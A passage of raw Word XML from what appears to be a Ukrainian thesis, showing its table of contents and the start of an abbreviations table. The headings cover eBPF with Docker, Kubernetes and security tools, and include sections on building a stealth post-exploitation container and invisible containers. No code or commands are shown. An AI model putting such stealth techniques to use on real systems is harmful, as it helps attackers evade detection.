          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:r w:rsidR="00362E9B" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> з платформами та інструментами безпеки</w:t>
      </w:r>
      <w:r w:rsidR="003E765A" w:rsidRPr="003E765A">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00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="008F2C97" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="935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2.1. </w:t>
      </w:r>
      <w:r w:rsidR="00362E9B" w:rsidRPr="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Технічні обмеження </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00362E9B" w:rsidRPr="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00362E9B" w:rsidRPr="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контексті контейнеризації</w:t>
      </w:r>
      <w:r w:rsidR="003E765A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="008F2C97" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="935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2.2. </w:t>
      </w:r>
      <w:r w:rsidR="008A258A" w:rsidRPr="008A258A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Сумісність </w:t>
      </w:r>
      <w:r w:rsidR="008A258A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та інтеграція </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A258A" w:rsidRPr="008A258A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A258A" w:rsidRPr="008A258A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> з </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A258A" w:rsidRPr="008A258A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A258A" w:rsidRPr="008A258A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008A258A" w:rsidRPr="008A258A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A258A" w:rsidRPr="008A258A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та іншими платформами</w:t>
      </w:r>
      <w:r w:rsidR="003E765A" w:rsidRPr="003E765A">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00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003E765A" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="935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2.3. </w:t>
      </w:r>
      <w:r w:rsidR="00234651">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Побудова </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00234651">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>стелс</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00234651">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00234651">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>пост</w:t>
      </w:r>
      <w:r w:rsidR="008A258A" w:rsidRPr="008A258A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>експлуатаційн</w:t>
      </w:r>
      <w:r w:rsidR="00234651">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ого</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A258A" w:rsidRPr="008A258A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> контейнер</w:t>
      </w:r>
      <w:r w:rsidR="00234651">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="003E765A">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00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="003E765A" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>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РОЗДІЛ 3</w:t>
      </w:r>
      <w:r w:rsidRPr="0028380F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00362E9B" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Оцінка продуктивності. Сценарії навантаження</w:t>
      </w:r>
      <w:r w:rsidR="003B3939" w:rsidRPr="003B3939">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="00D30D8A" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D193B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3.1. </w:t>
      </w:r>
      <w:r w:rsidR="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidR="00362E9B" w:rsidRPr="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">цінка продуктивності інтеграції </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00362E9B" w:rsidRPr="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00362E9B" w:rsidRPr="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контейнерні</w:t>
      </w:r>
      <w:r w:rsidR="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>й системі</w:t>
      </w:r>
      <w:r w:rsidR="003B3939">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00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="00D30D8A" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="935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3.2. </w:t>
      </w:r>
      <w:r w:rsidR="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Практичне</w:t>
      </w:r>
      <w:r w:rsidR="00362E9B" w:rsidRPr="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> застосування </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00362E9B" w:rsidRPr="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00362E9B" w:rsidRPr="00362E9B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> для невидимих контейнерів</w:t>
      </w:r>
      <w:r w:rsidR="003B3939">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>44</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11308" w:rsidRPr="00D30D8A" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31402">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ВИСНОВКИ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B3939">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00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>47</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A4EF9" w:rsidRPr="00D30D8A" w:rsidRDefault="00A11308" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF64B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>СПИСОК ВИКОРИСТАНИХ ДЖЕРЕЛ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B3939">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>49</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F50033" w:rsidRPr="00F50033" w:rsidRDefault="00F50033" w:rsidP="003E765A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9355"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F50033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ДОДАТКИ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F50033">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D30D8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C3ACC" w:rsidRDefault="007C3ACC">
      <w:pPr>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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C3ACC" w:rsidRDefault="007C3ACC" w:rsidP="007C3ACC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ПЕРЕЛІК УМОВНИХ</w:t>
      </w:r>
      <w:r w:rsidRPr="003F4E1A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ПОЗНАЧЕНЬ, СКОРОЧЕНЬ І ТЕРМІНІВ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008152AB" w:rsidRDefault="008152AB" w:rsidP="007C3ACC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a4"/>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425"/>
        <w:gridCol w:w="7797"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F95C31" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F95C31" w:rsidRDefault="00F95C31" w:rsidP="002B5777">
            <w:pPr>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ОС</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F95C31" w:rsidRDefault="00F95C31" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F95C31" w:rsidRDefault="00F95C31" w:rsidP="00F95C31">
            <w:pP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Операційна система</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F95C31" w:rsidTr="002B5777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F95C31" w:rsidRDefault="00F95C31" w:rsidP="002B5777">
            <w:pPr>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ПЗ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F95C31" w:rsidRDefault="00F95C31" w:rsidP="002B5777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D55BAE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7797" w:type="dxa"/>
          </w:tcPr>
